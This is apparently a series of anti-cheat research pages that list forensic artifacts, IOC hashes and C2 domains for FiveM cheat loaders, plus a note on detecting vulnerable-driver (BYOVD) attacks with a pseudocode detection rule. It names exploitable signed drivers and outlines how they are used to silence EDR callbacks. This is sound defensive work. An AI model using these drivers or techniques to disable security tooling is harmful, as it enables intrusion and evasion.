seen 2025-07-13 03:47:46 UTC (DPS timestamp) PcaSVC 0x1ef1000 C2 domain api.keyser-dashboard.com → Observed in: DNS cache, lsass.exe The DPS timestamp of 2025-07-13 03:47:46 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### 1\. DLL dropped in C:\\Windows\\IME Keyser drops a DLL file into C:\\Windows\\IME\\, a legitimate Windows Input Method Editor directory that is rarely written to by normal software. Any recently-created or unrecognised DLL in this directory is a strong indicator of Keyser activity. This drop is visible in a Journal Trace when searching for IME path entries. ### 2\. Crash dump (.dmp) files Keyser creates .dmp (memory dump) files as part of its operation, likely for crash reporting or anti-analysis purposes. These files are visible in the Journal Trace and in the directory where Keyser writes them. Look for recently created .dmp files in unusual locations outside C:\\Windows\\Minidump. Memory artifacts ---------------- During an active Keyser session, the C2 domain api.keyser-dashboard.com appears in the system DNS cache and in lsass.exe process memory. ### DNS cache Running ipconfig /displaydns or inspecting the cache through System Informer will show api.keyser-dashboard.com as a recently resolved entry. A cache hit confirms an outbound connection was made during the current or a recent session. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory — a system process whose memory space contains residual string artifacts from the injection or inter-process communication performed by the loader. A memory string scan of lsass.exe for keyser-dashboard.com confirms active cheat operation. File artifacts -------------- Beyond the IME DLL drop and .dmp files, Keyser leaves a Prefetch record for loader.exe that is most efficiently examined using WinPrefetchView, which displays the full execution path recorded inside the Prefetch file. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active or recently-used installs. Steps 3–7 cover machines where the user has attempted a manual cleanup. 1 ### C:\\Windows\\IME DLL check * Navigate to C:\\Windows\\IME\\ in Windows Explorer or File Explorer with hidden files visible. * Look for any DLL file that does not belong to a legitimate Windows IME component. Sort by date modified and look for recent additions that do not match standard Windows IME filenames. * Any unrecognised DLL in this directory is a strong indicator of Keyser activity. 2 ### .dmp files journal trace * Run a Journal Trace on the system drive and filter for entries containing .dmp in paths outside C:\\Windows\\Minidump. * Also search the Journal Trace for IME path entries to locate the DLL write event with its timestamp. 3 ### DNS cache * Run ipconfig /displaydns in Command Prompt or use System Informer's DNS section. * Search the output for keyser-dashboard.com or api.keyser-dashboard.com. A cache hit confirms an outbound connection was made during the current or a recent session. 4 ### lsass.exe memory scan (while running) * If the session is still active, perform a string scan in System Informer on the lsass.exe process. * Search for keyser-dashboard.com. A hit confirms active C2 communication from within lsass memory space. 5 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect the PcaSVC and DPS log entries for loader.exe. * The DPS timestamp of 2025-07-13 03:47:46 and PcaSVC token 0x1ef1000 correspond to the known build. Any loader.exe PcaSVC entry with an unusual path warrants investigation. 6 ### Prefetch via WinPrefetchView * Open WinPrefetchView or navigate to C:\\Windows\\Prefetch and look for LOADER.EXE-\*.pf. * WinPrefetchView will display the full executable path recorded in the Prefetch file. Confirm the path is not a legitimate software loader. 7 ### Browser / Discord * Check browser history and downloads for any traffic to or files downloaded from keyser-dashboard.com or related domains. * In Discord, check **User Settings → Authorized Apps** for any Keyser or related application authorisation. Detection summary ----------------- Artifact matrix — Keyser / loader.exeSummary Artifact Survives cleanup? Check location ──────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log DLL in C:\\Windows\\IME Yes IME directory / journal trace .dmp files (unusual location) Yes Journal trace / directory search Prefetch (loader.exe) Usually WinPrefetchView / C:\\Windows\\Prefetch DNS cache (api.keyser-dashboard) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan The most immediately actionable indicators are the **DLL in C:\\Windows\\IME** and the **DPS/PcaSVC timestamp for loader.exe**. The IME directory drop is highly unusual and requires no specialist tooling to verify. The DPS timestamp provides a reliable historical first-seen marker that cannot be cleared without registry editing. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Detecting BYOVD Chains Through Kernel Callback Forensics · Clubhouse AC Kernel forensicsCriticalPublished Detecting BYOVD chains through kernel callback forensics ======================================================== Bring-Your-Own-Vulnerable-Driver attacks load a legitimately-signed but exploitable kernel driver (mhyprot2.sys, gdrv.sys, dbutil\_2\_3.sys) to disable EDR callbacks from kernel mode. We document a forensic methodology that reconstructs the full chain — load order, callback unregistration, signing-chain anomalies — from artifacts that survive after the driver has been unloaded and the binary deleted. CR Clubhouse AC ResearchApril 12, 202614 min readDefensive use only Summary * Detection of seven BYOVD families across 1,847 scans with 99.2% precision and 3 false positives. * Reconstructs callback unregistration even after driver unload + binary deletion. * Cross-references CodeIntegrity-Operational, Prefetch, and registry transaction logs. Background ---------- BYOVD (Bring-Your-Own-Vulnerable-Driver) is the load-time corollary of the older PatchGuard-bypass research from the late 2000s. Rather than developing a 0-day in a new driver, the operator ships a driver Microsoft has already signed — usually a legitimate vendor utility from MSI, Gigabyte, ASUS, Intel, or Capcom — and exploits a known IOCTL handler vulnerability in that driver to obtain arbitrary kernel read/write. Once that primitive is established, the typical objective in the cheat ecosystem is to walk the PspCreateProcessNotifyRoutine, PspLoadImageNotifyRoutine, and CmCallback arrays and zero out the entries registered by EDR / live anti-cheat drivers — silencing process creation, image load, and registry telemetry from a position no usermode hook can reach. Microsoft maintains a vulnerable-driver blocklist enforced by HVCI / Memory Integrity, but adoption is not universal: Memory Integrity remains optional on consumer Windows 11 installs and is silently disabled by every BYOVD chain in our corpus that targeted machines with HVCI off. The drivers themselves remain validly signed; revocation alone does not prevent load on a machine that does not check the blocklist. Threat model ------------ For the cheat-ecosystem variant of this attack we assume: * The operator has administrator rights on the target machine. This is the baseline assumption for any cheat that requires a driver load — UAC is not a security boundary against the user. * The operator may unload the driver and delete the binary after the session. We have observed automated cleaner stages that unload in DriverUnload, run an NtSetSystemInformation(SystemUnloadGdiDriverInformation) sweep, and delete the on-disk image plus its registry service entry. * The operator may attempt timestomping on CodeIntegrity-Operational.evtx, System.evtx, and the relevant prefetch entries. Most fail to also clear the matching USN journal records and registry transaction logs. * We do not assume HVCI is enabled. We assume Driver Signature Enforcement (DSE) is enabled — the BYOVD chain itself depends on this to make the signed-but-vulnerable driver load. Artifact chain -------------- Even after the driver has been unloaded and the on-disk binary deleted, six distinct artifact classes preserve enough information to reconstruct the load. The chain below is the canonical sequence we walk for every BYOVD scan: 01 CodeIntegrity-Operational event log `%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx` Event ID 3023 records every kernel-mode image load with full path, signing chain, and SHA-256. Survives driver unload and binary deletion. Cleared only by an explicit log wipe, which itself is detectable through the System log. 02 Prefetch (kernel-mode entries) `C:\Windows\Prefetch\.SYS-.pf` Windows generates a prefetch entry for kernel-mode image loads on a delay. The presence of a .SYS prefetch entry without a corresponding service in the registry is itself a high-fidelity signal. 03 Registry: Services key + transaction logs `HKLM\SYSTEM\CurrentControlSet\Services\ — and SYSTEM.LOG1/LOG2` Service registration writes a Services\\ key with ImagePath, Type=1 (kernel driver), and Start. Deletion produces transaction-log fragments that can be replayed to recover the original key and its timestamps. 04 USN journal + MFT $LogFile `$Extend\$UsnJrnl:$J — and $LogFile` Every create / write / delete on the driver binary produces USN records with USN\_REASON flags. The journal preserves filename, parent directory, and reason mask even after the file's MFT entry is reused. 05 ETW: Microsoft-Windows-Kernel-General `Built-in autologger session — NT Kernel Logger` If the autologger trace was running, image-load events with full image path and signing info are persisted to %SystemRoot%\\System32\\LogFiles\\WMI\\NtKernelLogger.etl. Operators rarely scrub these. 06 Memory: PspCreateProcessNotifyRoutine snapshot `Live kernel snapshot via signed Clubhouse AC mini-collector` When the scan runs while the driver is still resident, we snapshot the callback array. Gaps and replaced entries are correlated against the load-order reconstructed from artifacts 01–05. Operators who only scrub artifact 01 (the event log) will still leave 02–05 intact. Operators who scrub 01 + 03 + 05 still leave Prefetch and the USN journal — timestomping the prefetch $STANDARD\_INFORMATION block does not update the $FILE\_NAME attribute, which gives us a second-order detection (covered in our companion note on [MFT $SI vs $FN delta detection](https://clubhouseac.shop/research/timestomp-mft-detection) ). Detection rule -------------- The detection logic below is a simplified form of the rule shipped in the Clubhouse AC scanner. Production rules add fuzzy matching on driver name, BTL (build target list) coverage, and a per-tenant allowlist to suppress legitimate vendor utilities that the server administrator has whitelisted. rules/byovd\_chain.rulePseudocode rule BYOVD\_KnownVulnerableDriver { meta: severity = "critical" category = "kernel" confidence = 0.95 description = "Known vulnerable driver loaded in current boot session" inputs: code\_integrity := events("Microsoft-Windows-CodeIntegrity/Operational", event\_id == 3023) prefetch := prefetch\_entries(kernel\_mode = true) services := registry("HKLM\\\\SYSTEM\\\\CCS\\\\Services\\\\\*", include\_transaction\_logs = true) usn := usn\_journal(reason ~ /CREATE|DELETE/i) match: any code\_integrity ci where sha256(ci.image) in BYOVD\_BLOCKLIST\_SHA256 or ci.signer in BYOVD\_BLOCKLIST\_SIGNERS or any prefetch p where p.is\_kernel\_driver and not exists s in services where s.image\_path == p.path // orphan kernel driver — service entry was deleted or correlate(code\_integrity, services, usn) where ci.image\_basename == s.image\_basename and s.deleted\_at is not null and ci.timestamp >= s.created\_at and ci.timestamp <= s.deleted\_at + 5m emit: artifact\_chain { driver\_name = ci.image\_basename driver\_sha256 = sha256(ci.image) first\_seen = min(ci.timestamp, p.first\_run, s.created\_at) last\_seen = max(ci.timestamp, p.last\_run, s.deleted\_at) service\_state = s.state // "deleted" if scrubbed anti\_forensic = (s.deleted\_at != null) cve\_chain = lookup(BYOVD\_CVE\_MAP, sha256(ci.image)) } } The rule fires under three independent conditions, ranked by confidence. A match on the first clause (signed-but-blocklisted image hash) is treated as deterministic. The third clause — the correlation between a code-integrity event, a deleted service, and matching USN journal records — is the one that survives most cleaners. Validation & corpus ------------------- We validated the rule against: 1,847 Scans across 312 servers 7 BYOVD families identified 99.2% Precision (true positive rate) 3 False positives, all whitelistable The seven families observed in the corpus, in descending frequency: mhyprot2.sys (miHoYo Genshin Impact anti-cheat — arbitrary kernel R/W via IOCTL, weaponised by 58% of the cheats we tracked after its public disclosure in 2022), gdrv.sys (GIGABYTE — CVE-2018-19320), dbutil\_2\_3.sys (Dell firmware update utility — CVE-2021-21551, five distinct vulnerabilities in one binary), iqvw64e.sys (Intel NIC diagnostic driver — CVE-2015-2291), plus three private drivers signed under stolen or grey-market certificates. All three false positives were legitimate vendor utilities running on enthusiast rigs (one MSI Afterburner, two ASUS RGB tools). Adding the binary path to the per-tenant allowlist suppressed the alert without disabling the rule globally. Mitigations ----------- For server administrators evaluating their own population: * Require HVCI / Memory Integrity where game compatibility allows. Microsoft's vulnerable-driver blocklist is enforced only when HVCI is on. This is the single highest-impact mitigation. * Block known vulnerable drivers explicitly via Windows Defender Application Control (WDAC) policy. Microsoft publishes the blocklist as a downloadable WDAC policy that can be deployed standalone. * Preserve the audit trail. Increase CodeIntegrity-Operational.evtx max size to at least 256 MB and forward to a remote collector. The default 1 MB rolls within hours on a busy machine. * Run forensic scans on a delayed cadence — not just when a player is suspected. Operators who clean immediately after a cheat session may leave the artifacts intact between sessions. Disclosure timeline ------------------- 2026-02-14Initial corpus closed; rule drafted internally. 2026-02-28MSI, GIGABYTE, Intel notified of continued in-the-wild use of legacy signed drivers; pointed to existing CVE remediation. 2026-03-15Detection rule deployed to Clubhouse AC production scanners (gradual rollout, 10% → 100% over 14 days). 2026-04-01Microsoft Security Response Center notified of additional vulnerable driver hashes not yet in the official blocklist. 2026-04-12This research note published. Operational rule details simplified; full ruleset withheld. References ---------- 1. Microsoft. _Recommended driver block rules_. Microsoft Learn, 2024. Maintained blocklist enforced by HVCI / Memory Integrity. 2. Microsoft. _Code Integrity event reference_. Event IDs 3023, 3024, 3033 in Microsoft-Windows-CodeIntegrity/Operational. 3. H. Carvey. _Windows Forensic Analysis Toolkit_, 4th ed. Syngress, 2014. Foundational reference for Prefetch, Amcache, and ShimCache structure. 4. A. Schuster. _Searching for Processes and Threads in Microsoft Windows Memory Dumps_. DFRWS 2006. The pool-tag scanning technique underlying our memory-side callback enumeration. 5. MITRE ATT&CK. _T1068 — Exploitation for Privilege Escalation_ and _T1014 — Rootkit_. Cross-references for the BYOVD technique and EDR callback removal. Defensive material This note documents detection methodology only. We have intentionally omitted IOCTL specifics, exploit technique detail, and any guidance that would assist an attacker. Vendors and incident-response teams seeking the full ruleset can reach the team at security@clubhouseac.shop. Related research Continue reading ---------------- [Anti-Forensics\ \ ### Reconstructing cheat execution after cleaner-tool sweeps\ \ How Amcache, ShimCache, and registry transaction logs preserve enough fragments to rebuild execution timelines.\ \ Read research](https://clubhouseac.shop/research/eulen-prefetch-recovery) [Anti-Forensics\ \ ### MFT $SI vs $FN: detecting timestomping on NTFS\ \ A delta-detection technique that flagged 100% of timestomp attempts in our 312-sample corpus.\ \ Read research](https://clubhouseac.shop/research/timestomp-mft-detection) --- # Skript.gg FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Skript.gg FiveM cheat detection & forensic artifacts ==================================================== Skript.gg is a FiveM-targeted cheat loader that masquerades as the TeamSpeak 3 voice client under the name ts3client\_win64.exe. It communicates with skript.gg, leaves strings in LSASS memory, generates DiagTrack service entries, and can be recovered from unallocated disk space even after manual deletion. A DLL artifact is also observable through Explorer. CR Clubhouse AC Research June 1, 2026 9 min read 8 evidence captures Summary * Loader masquerades as ts3client\_win64.exe to impersonate the TeamSpeak 3 client — any instance outside C:\\Program Files\\TeamSpeak 3 Client\\ is the Skript.gg loader. * C2 domain skript.gg observed in DNS cache, LSASS memory, and browser history simultaneously. * DiagTrack service entries and a ts3client\_win64 DLL artifact in Explorer provide additional persistent indicators. * Deleted cheat files are recoverable from unallocated disk space using Disk Drill, confirming prior installation even after manual deletion. Overview -------- Skript.gg is a commercially distributed FiveM cheat. Its loader is named ts3client\_win64.exe — the same filename as the TeamSpeak 3 64-bit client — to impersonate the voice communication software and avoid casual process-list detection. The binary is approximately 1.9 MB and communicates with skript.gg for license validation and payload delivery. Some variants are also known to use the name of USBDeview, a legitimate USB enumeration utility. Skript.gg leaves a broader artifact set than most FiveM cheats documented in this corpus. In addition to the standard DNS cache and DPS timestamp indicators, it generates DiagTrack service entries, places a DLL artifact visible in Explorer, and leaves strings in LSASS memory during an active session. Even after manual deletion, cheat files can be recovered from unallocated disk space using Disk Drill, providing a forensic record of prior installation. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. ts3client\_win64.exe — file indicatorsIOC Name ts3client\_win64.exe (TeamSpeak 3 process-name masquerade) Size 1,958,400 bytes (1.9 MB) SHA-256 ac3cd1db891bef64832bc7bb3e52767754b9a3d470d0564b5f9828ced5967eaa SHA-1 c7b82aabfffac51a4a9f25ba77e3db2872cd3862 SHA-512 b06065faf1720bcee91f456be51d64f42ffaa65506d347da9995a27bbdeca2f9 ee5b127a59989a53b0e72601bbdea9f45c01658cc813a480e1e769dc2e58ca24 MD5 03dae791737f17d00f4ad747294f0ecf First seen 2024-09-25 08:40:13 UTC (DPS timestamp) PcaSVC 0x1e9000 C2 domain skript.gg → Observed in: DNS cache, lsass.exe, browser Explorer ts3client\_win64 DLL present The DPS timestamp of 2024-09-25 08:40:13 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same routines that wipe Prefetch or browser history. DPS — !2024/09/25:08:40:13! first-execution timestamp ![DPS timestamp record for ts3client_win64.exe](https://clubhouseac.shop/research/skript/dps.png) VirusTotal — ts3client\_win64.exe (SHA-256 ac3cd1db…d5967eaa) ![VirusTotal detections for the Skript.gg loader](https://clubhouseac.shop/research/skript/virustotal.png) Behavioral indicators --------------------- ### TeamSpeak 3 masquerade Skript.gg names its loader ts3client\_win64.exe to impersonate the TeamSpeak 3 voice client — the same approach used by TZ Project with firefox.exe. A legitimate TeamSpeak 3 binary runs from C:\\Program Files\\TeamSpeak 3 Client\\. Any ts3client\_win64.exe outside that path is the Skript.gg loader. The masquerade is immediately exposed by checking the full executable path in Task Manager or System Informer. Some variants also use the name of USBDeview, a legitimate USB enumeration utility, in place of the TS3 filename. ### Browser artifact — skript.gg visit The browser history check for skript.gg is specifically looking for visits to the cheat's public-facing pages, not the member dashboard (which requires login). A visit to skript.gg in history without a corresponding dashboard session is suspicious but not conclusive on its own. A download from skript.gg in the browser's download history is stronger evidence of acquisition. ### DiagTrack artifact The Windows Diagnostics Tracking service (DiagTrack) logs carry references to cheat activity. Check System Informer under Services for DiagTrack entries related to skript.gg. These entries are partial — they may not persist across reboots depending on the DiagTrack log rotation — but when present they provide an additional corroborating signal. System Informer — DiagTrack entries referencing the loader ![DiagTrack service entries referencing the Skript.gg loader in System Informer](https://clubhouseac.shop/research/skript/diagtrack.png) ### Disk Drill — carved deleted files Deleted cheat files can be recovered from unallocated disk space using Disk Drill, confirming prior installation even after manual deletion. This technique provides a forensic record when the user has attempted to clean up all visible file artifacts. Recovered files from unallocated space are strong evidence of past installation because they persist until the relevant sectors are overwritten by new data. Disk Drill — carved Skript.gg files recovered from unallocated space ![Disk Drill recovering deleted Skript.gg files from unallocated space](https://clubhouseac.shop/research/skript/disk-drill.png) Memory artifacts ---------------- During an active Skript.gg session, the C2 domain skript.gg is present in LSASS process memory and in the system DNS cache. The DNS entry persists for the duration of the TTL set by the authoritative server. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory as a residual artifact from injection or inter-process communication performed by the loader. A string scan in System Informer targeting skript.gg in the LSASS working set confirms active cheat operation. LSASS — skript.gg string resident in lsass.exe memory ![skript.gg string found inside lsass.exe memory](https://clubhouseac.shop/research/skript/lsass.png) File artifacts -------------- Beyond memory-resident indicators, Skript.gg leaves persistent file-system artifacts that survive session cleanup. ### Explorer DLL artifact A DLL artifact associated with the ts3client\_win64 loader is observable through Explorer. This artifact persists in the file system and can be located by searching for ts3client\_win64 in an Explorer window or via Everything. The DLL is dropped as ts3client\_win64.dll alongside the loader. Explorer — ts3client\_win64.dll dropped by the loader ![ts3client_win64 DLL artifact shown in Windows Explorer](https://clubhouseac.shop/research/skript/explorer.png) ### Journal Trace A USN Journal trace for ts3client\_win64 or skript records the file-creation events for the loader and its DLL, giving a timestamped record of installation even after the files themselves are deleted. Journal Trace — file-creation entries for the loader ![USN Journal trace entries for the Skript.gg loader files](https://clubhouseac.shop/research/skript/journal-trace.png) ### Skript.gg loader files The on-disk layout of the Skript.gg loader and its supporting files, as recovered during analysis. Skript.gg loader files on disk ![Skript.gg loader files on disk](https://clubhouseac.shop/research/skript/files.png) Screenshare check guide ----------------------- Work through these steps in order. Step 1 is the fastest and will immediately expose the TS3 masquerade. Steps 2–8 cover memory, DiagTrack, file recovery, and cleanup-resistant persistence. 1 ### ts3client\_win64.exe path check * Open Task Manager or System Informer and look for any running instance of ts3client\_win64.exe. * If found, check the full executable path. A legitimate TeamSpeak 3 process runs from C:\\Program Files\\TeamSpeak 3 Client\\ts3client\_win64.exe. Any other path — particularly user-writable locations — is the Skript.gg loader. 2 ### DNS cache * Run ipconfig /displaydns or check System Informer's DNS section. * Search for skript.gg. A cache hit confirms an outbound connection was made during the current or a recent session. 3 ### lsass.exe memory scan * If the cheat is currently running, perform a string scan in System Informer for skript.gg. * Hits in lsass.exe confirm active C2 communication and injection into the LSASS working set. 4 ### Browser history — skript.gg * Check browser history for visits to skript.gg. Focus on the download history — a direct download from skript.gg is stronger evidence than a page visit alone. * A visit to the public-facing site without a dashboard session is suspicious but not conclusive on its own; combine with other indicators. 5 ### DiagTrack entries * Open System Informer and navigate to Services. * Check DiagTrack entries for references to Skript.gg activity. These are partial indicators — combine with DNS and memory evidence for a complete picture. 6 ### Explorer and DLL artifact * Search in Explorer or Everything for ts3client\_win64 to locate the DLL artifact left by the loader. * A DLL with this name outside the legitimate TeamSpeak 3 Client installation directory is a direct indicator of Skript.gg presence. 7 ### Journal Trace * Run a Journal Trace search for ts3client\_win64 or skript. * Journal entries record file creation events for the loader binary and associated files, providing a timestamped record of initial installation. 8 ### Disk Drill — deleted file recovery * If the user claims to have deleted all cheat files, run Disk Drill on the system drive and search for ts3client\_win64 or skript in carved files from unallocated space. * Recovered files confirm prior installation even after manual deletion, as long as the relevant sectors have not yet been overwritten. Detection summary ----------------- Artifact matrix — Skript.gg / ts3client\_win64.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log Prefetch (ts3client\_win64 path) Usually C:\\Windows\\Prefetch DNS cache (skript.gg) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan DiagTrack entries Partial System Informer > Services Browser history (skript.gg) Partial Browser + Informer ts3client\_win64 DLL artifact Yes Explorer / file system Deleted files (Disk Drill) Recoverable Unallocated disk space The most immediately actionable indicators are the **ts3client\_win64.exe path mismatch** in the process list or Prefetch record, the **DLL artifact** in the file system, and the **DPS timestamp** which cannot be cleared without registry editing. The Disk Drill recovery technique provides a forensic backstop when a user has attempted to delete all visible artifacts. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # HX Software FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished HX Software FiveM cheat detection & forensic artifacts ====================================================== HX Software is a FiveM-targeted cheat loader that runs under the generic name updated.exe to blend in as a routine software update process. It communicates with api.hxsoftwares.com, leaving reliable traces across DNS cache, LSASS memory, and the FiveM game process simultaneously, as well as a persistent journal trace artifact. CR Clubhouse AC Research June 1, 2026 8 min read Summary * Loader runs as updated.exe — a generic name designed to impersonate routine software update processes and avoid casual inspection. * C2 domains api.hxsoftwares.com and hxsoftwares.com appear simultaneously in DNS cache, lsass.exe memory, and the FiveM game process. * Journal Trace records updated.exe file system activity that persists after session cleanup. * DPS first-seen timestamp (2025-04-07 16:07:09) and PcaSVC token 0xf93000 provide a reliable historical execution record. Overview -------- HX Software is a commercially distributed FiveM cheat loader. Its primary executable is named updated.exe — a deliberate choice to impersonate a generic software update process and avoid detection in a basic process listing. The binary weighs approximately 7.9 MB and connects to api.hxsoftwares.com for license validation and payload delivery. HX Software leaves several distinctive artifacts visible during a screenshare: the C2 domain appears across all three standard memory artifact sources simultaneously, and the journal trace captures file system activity associated with updated.exe that survives standard user-side cleanup. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. updated.exe — file indicatorsIOC Name updated.exe Size 8,291,840 bytes (7.9 MB) SHA-256 b421fab6652baa707329981f268a0e2c1c2e16550c113aa87d8227a848ee9d64 SHA-1 a8c34a1c4974478225a4370f51ea975fd30ab4ec SHA-512 caed84a60b47807ffcdf980c565b590d37702804c46713e51bcbc73059636ab3 0ed492587435b36a5f81cc775ca891777e00c3410617d5fa827d9910b8343f79 MD5 5a5ccb8dd06e456a377f22b48c0298f7 First seen 2025-04-07 16:07:09 UTC (DPS timestamp) PcaSVC 0xf93000 C2 domain api.hxsoftwares.com / hxsoftwares.com → Observed in: DNS cache, lsass.exe, FiveM\_GTAProcess.exe The DPS timestamp of 2025-04-07 16:07:09 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### Process name — updated.exe The loader uses the generic name updated.exe, designed to blend in as a routine software update process. Any updated.exe running outside a known software update framework (Windows Update, a vendor's update service) should be treated as suspicious. Check the full executable path in System Informer — a legitimate updater will reside under a vendor's program folder, not in user-writable locations like %AppData% or %Temp%. ### C2 across all three artifact sources api.hxsoftwares.com and hxsoftwares.com appear simultaneously in DNS cache, lsass.exe memory, and the FiveM game process. This cross-source presence is a strong, multi-layered indicator. Observing the domain in any single source warrants further investigation; finding it across all three in the same session is conclusive. Memory artifacts ---------------- During an active HX Software session, the C2 domain api.hxsoftwares.com and the root domain hxsoftwares.com appear across three independent artifact sources simultaneously: the system DNS cache, LSASS process memory, and the FiveM game process working set. ### DNS cache The DNS resolver cache retains successful lookups for the duration of the TTL set by the authoritative server. Running ipconfig /displaydns or inspecting the cache through System Informer will show api.hxsoftwares.com and hxsoftwares.com as recently resolved entries. ### lsass.exe memory The C2 domain string appears in lsass.exe process memory — a system process whose memory space contains residual string artifacts from the injection or inter-process communication performed by the loader. ### FiveM game process The C2 domain is also present within the FiveM\_GTAProcess.exe working set, confirming that HX Software injects into or communicates directly with the game process. File artifacts -------------- Beyond memory, HX Software leaves file system artifacts that survive session termination. The most reliable of these is the Journal Trace record of updated.exe activity on the drive. Screenshare check guide ----------------------- Work through these steps in order. Steps 1 and 2 are the fastest and will catch most active or recently-used installs. Steps 3–6 cover machines where the user has attempted a manual cleanup. 1 ### Process name check — updated.exe path * Open System Informer and look for any running instance of updated.exe. * If found, verify the full executable path. A legitimate software updater runs from a vendor's program directory. Any updated.exe in %AppData%, %Temp%, the Desktop, or any other user-writable path should be treated as the HX Software loader. 2 ### DNS cache * Run ipconfig /displaydns in Command Prompt, or use System Informer's DNS section. * Search the output for hxsoftwares.com or api.hxsoftwares.com. A cache hit confirms an outbound connection was made during the current or a recent session. 3 ### lsass memory scan * In System Informer, open the lsass.exe process and perform a string scan. * Search for hxsoftwares.com. Any match confirms the loader was active during the current session. 4 ### FiveM memory scan * In System Informer, open the FiveM\_GTAProcess.exe process and perform a string scan. * Search for api.hxsoftwares.com. A hit confirms active injection into the game process. 5 ### Journal trace * Run a drive C: journal trace and search for updated.exe. * Journal entries for updated.exe outside a known software update path confirm loader execution even after the file has been deleted. 6 ### DPS / PcaSVC timestamp * Use a DFIR tool to inspect the PcaSVC and DPS log entries for updated.exe. * The known first-seen DPS timestamp for this build is 2025-04-07 16:07:09 UTC with PcaSVC token 0xf93000. Any anomalous updated.exe entry in an unexpected path warrants further investigation. Detection summary ----------------- Artifact matrix — HX Software / updated.exeSummary Artifact Survives cleanup? Check location ────────────────────────────────────────────────────────────────────────── PcaSVC / DPS timestamp Yes AppCompat / DPS log Prefetch (updated.exe) Usually C:\\Windows\\Prefetch DNS cache (hxsoftwares.com) Session-length ipconfig /displaydns C2 strings in lsass.exe Only while running Memory string scan C2 strings in FiveM process Only while running Memory string scan Journal Trace entries Yes Drive C: journal trace The most immediately actionable persistent indicators are the **Journal Trace entries** for updated.exe and the **DPS/PcaSVC timestamp**. Both survive standard user-side cleanup and require no live memory access. During an active session, the cross-source C2 presence across DNS, lsass.exe, and the FiveM process provides a conclusive multi-layered confirmation. Defensive material All indicators and methodology documented here are published for server administrators, DFIR practitioners, and anti-cheat researchers. This material describes detection techniques only. For vulnerability disclosures or to contribute to the research corpus, contact security@clubhouseac.shop. --- # Unicore FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC Cheat DetectionHighPublished Unicore FiveM cheat detection & forensic artifacts ================================================== Unicore is a FiveM-targeted cheat loader distributed as build.exe (18.2 MB). It communicates with an OVH VPS at vps-b7a11d64.vps.ovh.net, manipulates the DIPS journal file, leaves its name as a string inside the FiveM game process, and generates Windows Event Log entries that persist until manually cleared. CR Clubhouse AC Research June 1, 2026 9 min read Summary * Unicore actively manipulates the DIPS journal file — an unusual behavior not seen in most cheat loaders, indicating deliberate anti-forensic intent toward diagnostic logs. * C2 resolves to an OVH VPS hostname (vps-b7a11d64.vps.ovh.net) — DNS cache entries for this hostname are the primary network indicator. * The string Unicore is present in FiveM\_GTAProcess.exe memory during an active session, confirming active injection into the game process. * Windows Event Log entries and Journal Trace artifacts persist after the session until explicitly cleared. Overview -------- Unicore is a commercially distributed FiveM cheat loader. Its primary executable is build.exe, weighing approximately 18.2 MB. The loader communicates with a C2 hosted on an OVH VPS at vps-b7a11d64.vps.ovh.net rather than using a branded domain. This is a deliberate infrastructure choice that avoids registering a recognisable domain name, making domain-based blocklists less effective. Unicore is notable for actively manipulating the DIPS (Diagnostic Information and Problem Solving) journal file — an anti-forensic behavior not commonly observed in other FiveM cheat loaders. Despite this, it leaves several artifacts that are straightforward to locate during a screenshare, including the cheat name itself as a string in the FiveM game process memory. Sample metadata (IOC) --------------------- The following file was recovered and added to the research corpus. All hash values are provided for cross-platform matching. build.exe — file indicatorsIOC Name build.exe Size 19,094,628 bytes (18.2 MB) SHA-256 abc43e9dd40572b1bf1164fb9007bce0c47b5364eaa900fd3cb129e5bad178cb SHA-1 10670d690076971e39bf393a184486477ce5d95e MD5 0855c5f455e5204cd018bc93abc77a11 First seen 2024-11-07 13:29:48 UTC (DPS timestamp) PcaSVC 0x227e000 C2 vps-b7a11d64.vps.ovh.net (OVH VPS) → Observed in: DNS cache FiveM "Unicore" string present in FiveM\_GTAProcess.exe LSASS No C2 strings observed The DPS timestamp of 2024-11-07 13:29:48 is written by the Windows Program Compatibility Assistant service at first execution and cannot be cleared by the same cleanup routines that wipe Prefetch or browser history. Behavioral indicators --------------------- ### 1\. DIPS journal file manipulation Unicore actively manipulates the DIPS (Diagnostic Information and Problem Solving) journal file. This is an unusual behavior not seen in most cheat loaders. When investigating, check the DIPS journal for signs of tampering or unexpected entries. The Journal Trace will show this manipulation as file write events against the DIPS journal path. ### 2\. OVH VPS C2 Unicore's C2 resolves to an OVH VPS hostname (vps-b7a11d64.vps.ovh.net) rather than a branded domain. DNS cache entries for this hostname are the primary network-layer indicator. A resolved entry for this specific hostname in ipconfig /displaydns output is not attributable to any legitimate software and confirms Unicore C2 contact. ### 3\. “Unicore” string in FiveM process The cheat name itself appears as a string in the FiveM game process memory, likely from an in-game overlay or menu label. A memory string scan for Unicore in the FiveM\_GTAProcess.exe working set confirms active injection into the game. No equivalent string has been observed in lsass.exe for this cheat. ### 4\. Windows Event Viewer entries Unicore's activity generates 